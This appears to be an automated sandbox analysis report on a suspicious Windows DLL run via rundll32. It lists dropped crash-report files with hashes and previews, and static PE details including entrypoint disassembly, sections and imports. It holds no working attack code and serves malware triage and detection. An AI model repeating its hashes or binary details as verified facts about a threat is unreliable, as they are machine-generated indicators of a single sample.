                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.1.4.2.9.7.4.9.3.2.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.1.4.4.5.5.9.3.0.4.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.3.0.3.1.1.9.-.3.b.b.f.-.4.b.e.e.-.8.2.5.7.-.4.6.4.a.1.5.1.8.8.5.a.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.3.f.6.3.3.9.-.6.d.c.7.-.4.2.f.c.-.8.6.4.4.-.b.0.5.f.5.b.8.5.e.f.f.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.f.0.-.0.0.0.1.-.0.0.1.6.-.9.e.b.d.-.4.6.c.e.2.c.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER618E.tmp.dmp
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:50:24 2021, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):35728
                                                                                          Entropy (8bit):2.3895420553113427
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:QEcWzMrXhUhWtMdHuIQLGSV2gDXC7pVjepVSUnyfzLzn:wWzMNUw2dHYLRV9S7pJe+UmXn
                                                                                          MD5:C980BDF6B563D30FA312FD9BF6191F93
                                                                                          SHA1:A451988E0042DAB59BD4D52EC5312CBCB9FD969C
                                                                                          SHA-256:48ADC678ADA085ED6794FAAA554FD49664350BFFBDEAFE633BF13BA0E324BE66
                                                                                          SHA-512:AF338840302787068FB203A2D7A35476D9F0E3778A60F666A12B0340D5A2C1B531D84072633F38E66A0051584445A75E25F5B754F269995D276040099330856E
                                                                                          Malicious:false
                                                                                          Preview: MDMP....... ....... "ea...................U...........B..............GenuineIntelW...........T............!ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER641E.tmp.dmp
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:50:27 2021, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):33944
                                                                                          Entropy (8bit):2.4971407466657674
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:MqbUQaZobrmnWtMdHuIQLGSw7KJBJFC418LfVnuXi:WMbt2dHYLRw8LQw8RuXi
                                                                                          MD5:ED1E5F7A96BD8C5678207BB626E3B182
                                                                                          SHA1:5FF459096BE638E25946DA755E3B42C8BADEEE73
                                                                                          SHA-256:CFF33D2F88999800F4CB2B160AE186D60D4AC94B582D92A6FF0EC16AD2429482
                                                                                          SHA-512:F369CBEC9506EDFD281F8E40ED243325D553CF0118A6F880FF37E99B3F405B913A1DEE420ADDA1DB560851B62A319EFBED9CF980C6EE0F39C55C5EADEEE795F8
                                                                                          Malicious:false
                                                                                          Preview: MDMP....... .......#"ea...................U...........B..............GenuineIntelW...........T.......H....!ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER78C0.tmp.WERInternalMetadata.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8410
                                                                                          Entropy (8bit):3.6978573974817097
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Rrl7r3GLNiHn6nq96Y+k63gmf8dSPCprx89bNasfivm:RrlsNiH6q96Yd63gmf8dS5N5fz
                                                                                          MD5:1DA794412F26C38602614685A8EE012A
                                                                                          SHA1:D3809FC946708E94D4C26AA87AB3A0F63D8DA902
                                                                                          SHA-256:5247CB378F8D8ED99506A57FE11CAC96B9A1852A2861162053B0B609B65FE16D
                                                                                          SHA-512:78568E371F6E42A35E97581B03EF545C9C1CF2E2B227B51DCA0D76234224AD02939EE09D0D44C1C22432D764BB39585A1CC61E56FE68FBD1A31B767943BAE2EE
                                                                                          Malicious:false
                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.4.8.<./.P.i.d.>.......
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D74.tmp.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4771
                                                                                          Entropy (8bit):4.480321171931333
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwSD8zspJgtWI90yWSC8Bs8fm8M4JCdsjMFXy+q8vjsjNc34SrS8ad:uITf7nTSN/JJ2yKONc3DW/d
                                                                                          MD5:C33A482127B7209EF51325AC96C085D2
                                                                                          SHA1:7E03254FA9071E6EB0A880248E3861CCF9725C06
                                                                                          SHA-256:35F6DC0BD6946C69214D132B5212A5C3C22C3DC3576567042E006EADDC1009A7
                                                                                          SHA-512:F244067052BA64DE48D46B2469932A6723D48B73B38E9B6F04DAFA6839F1ED5CC76764F1831CDAE62EF0EAF4C51ED329F6F5DE2DA2D204B3F0420FB624F9C1D1
                                                                                          Malicious:false
                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206181" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EEA.tmp.WERInternalMetadata.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8410
                                                                                          Entropy (8bit):3.698928902317836
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Rrl7r3GLNinR6/o6Y+W63gmf8dSPCprp89bEssfpsm:RrlsNiR6/o6Yf63gmf8dSRE/f3
                                                                                          MD5:4C0A64AF5A4E98C589035B3D6D31758A
                                                                                          SHA1:6AAD8DFB5F4E8987147668F43141380038B7F327
                                                                                          SHA-256:065C35A21B6A897FE8122FB194D355F5A121FD9D1D46E5CEC6F006BFB58CB374
                                                                                          SHA-512:3BDFD7FBEE619CC1340B35531A458988664BE9B2A55F0ECEDACAA7313AD8A417831854DE5A6EC7C56B13840149C11189C7D8DE736955CBE759A0A60B75A9BC3B
                                                                                          Malicious:false
                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.8.0.<./.P.i.d.>.......
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER861F.tmp.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4771
                                                                                          Entropy (8bit):4.481061523546041
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwSD8zspJgtWI90yWSC8BN8fm8M4JCdsjMFpo+q8vjsjG4SrS5d:uITf7nTSNsJJ0oKOGDW5d
                                                                                          MD5:664B4582229AD3ECE4BEBC614E508369
                                                                                          SHA1:5238FF8643575C4C09BA5C30A1D8D61E5A15EBF2
                                                                                          SHA-256:B0742289DDACB40DBF830E5308EC88FB4CEBFE03E4BDE54992708EDCB5D0750A
                                                                                          SHA-512:155C2A3A298996007A5D9696F8FEE6AB3AFA77B70519348123B83D5AA869A5DCC4FF49715F7D27D8D9F041471278AAA6860AC156F5C5E7031D3CFA864735D195
                                                                                          Malicious:false
                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206181" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8830.tmp.dmp
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:50:34 2021, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):35442
                                                                                          Entropy (8bit):2.388382779654516
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:p1l+vWtMdHuIQLGSLLgL95JQGFW1l6c6nwpIAS:7l+e2dHYLRLQ97QKW1lg63S
                                                                                          MD5:8E3A91DE6D34C6B37A18863FC52FD781
                                                                                          SHA1:F4ABB52DC5D993F6B3C7FAC44FDBCB595A6E1945
                                                                                          SHA-256:DBF4090005CFA672CDE2A08892B07517D70AE5BF79682A0C860BC3A403E14033
                                                                                          SHA-512:69A66C9220261386403D262E8D396AC68EB59E9910CB9D8D170C1B5218AC2625B9EFFBE2C114B1C1E8858C8BA89902628A20005FF5D38C0CF9DB1EF2803CBB9E
                                                                                          Malicious:false
                                                                                          Preview: MDMP....... .......*"ea...................U...........B..............GenuineIntelW...........T............!ea!............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D40.tmp.WERInternalMetadata.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8406
                                                                                          Entropy (8bit):3.6991459004086367
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Rrl7r3GLNi9M06e6Y+b63gmf8dSPCprc89bX9sfAdm:RrlsNiP6e6Yy63gmf8dSOX2fX
                                                                                          MD5:EC2B0AB20C4D7D29A40FA0B7F2CEFB08
                                                                                          SHA1:C3E1BE92C6AD26216F7716C7435AF8D02097BAE7
                                                                                          SHA-256:179E9395CFD91EA03A0C11DC8F20B5D00C16A50BCEC678880E0003CCB42FD713
                                                                                          SHA-512:4E14D4F39966D4DD4F54946F6B90079C674B3D3EE7588295B13E0CCD2FBD0C17E8FE7949BB245C0D63424074372B51F705237BB27333A4F88B3D31283881A389
                                                                                          Malicious:false
                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.5.6.<./.P.i.d.>.......
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA35B.tmp.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4771
                                                                                          Entropy (8bit):4.481644751827183
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwSD8zspJgtWI90yWSC8BULs8fm8M4JCdsjMFxSV+q8vjsj74SrS6d:uITf7nTSNOLRJJGcKO7DW6d
                                                                                          MD5:C31A63EB601F08250D9259422447EF2D
                                                                                          SHA1:0A24CAF93C43688624BC5D8CE60C71C94A9728E9
                                                                                          SHA-256:2CFB01390B883D688A8746DBE48DE7B3586C184BE46B61229C3C9A337E00E951
                                                                                          SHA-512:0E970114A231C8D777D6C1AD7929AF8CDA8B5E3203483ABD5A51F74CFA5DA65C6E8DFB9B01E42814C76FA774EB96086D9E3E425B994726F93ED3591B8906977D
                                                                                          Malicious:false
                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206181" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):6.669873789159674
                                                                                          TrID:
                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:6yDD19jMIu.dll
                                                                                          File size:718336
                                                                                          MD5:903cf677ba834a968b42bd71e4626a9d
                                                                                          SHA1:c751f3ab4612917d15967fc1f0591e674c2e56ca
                                                                                          SHA256:b601a3c9c3a3df9043ea82733f1da5b413207d7585ca6b18baa8a4d923ce92d8
                                                                                          SHA512:b81d6b419c05ac351d086ab9d439b7cf2d8db21208f85b13e483bacb800a811890ca7fc3ce2295d2861f3323b0d52725e27f42758ef4ec6312018b4a7a249095
                                                                                          SSDEEP:12288:1UAQSx16fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsF:1z3x16fq8Np6bTPPaBreaZlYCOSVol2S
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................."w|.............].......].......]......."wf.............].......].......]...............].......Rich...........

                                                                                          File Icon

                                                                                          Icon Hash:74f0e4ecccdce0e4

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x1003ab77
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x10000000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                          Time Stamp:0x5F6FF725 [Sun Sep 27 02:21:25 2020 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:6
                                                                                          OS Version Minor:0
                                                                                          File Version Major:6
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:6
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          cmp dword ptr [ebp+0Ch], 01h
                                                                                          jne 00007F0B1092C057h
                                                                                          call 00007F0B1092CB42h
                                                                                          push dword ptr [ebp+10h]
                                                                                          push dword ptr [ebp+0Ch]
                                                                                          push dword ptr [ebp+08h]
                                                                                          call 00007F0B1092BEFAh
                                                                                          add esp, 0Ch
                                                                                          pop ebp
                                                                                          retn 000Ch
                                                                                          mov ecx, dword ptr [ebp-0Ch]
                                                                                          mov dword ptr fs:[00000000h], ecx
                                                                                          pop ecx
                                                                                          pop edi
                                                                                          pop edi
                                                                                          pop esi
                                                                                          pop ebx
                                                                                          mov esp, ebp
                                                                                          pop ebp
                                                                                          push ecx
                                                                                          ret
                                                                                          mov ecx, dword ptr [ebp-10h]
                                                                                          xor ecx, ebp
                                                                                          call 00007F0B1092BC53h
                                                                                          jmp 00007F0B1092C030h
                                                                                          mov ecx, dword ptr [ebp-14h]
                                                                                          xor ecx, ebp
                                                                                          call 00007F0B1092BC42h
                                                                                          jmp 00007F0B1092C01Fh
                                                                                          push eax
                                                                                          push dword ptr fs:[00000000h]
                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          mov dword ptr [eax], ebp
                                                                                          mov ebp, eax
                                                                                          mov eax, dword ptr [100AA0D4h]
                                                                                          xor eax, ebp
                                                                                          push eax
                                                                                          push dword ptr [ebp-04h]
                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                          ret
                                                                                          push eax
                                                                                          push dword ptr fs:[00000000h]
                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          mov dword ptr [eax], ebp
                                                                                          mov ebp, eax
                                                                                          mov eax, dword ptr [100AA0D4h]
                                                                                          xor eax, ebp
                                                                                          push eax
                                                                                          mov dword ptr [ebp-10h], eax
                                                                                          push dword ptr [ebp-04h]
                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                          ret
                                                                                          push eax
                                                                                          inc dword ptr fs:[eax]

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0xa89900x80.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa8a100x50.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1460000x53d0.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xa474c0x54.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa47a00x40.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x7b0000x1fc.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x79f710x7a000False0.510071801358data6.75462598911IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x7b0000x2e5860x2e600False0.556366871631data5.60177209336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0xaa0000x9b19c0x1800False0.190266927083data4.15778005426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x1460000x53d00x5400False0.752650669643data6.72453697464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Imports

                                                                                          DLLImport
                                                                                          KERNEL32.dllLockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                          USER32.dllCreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
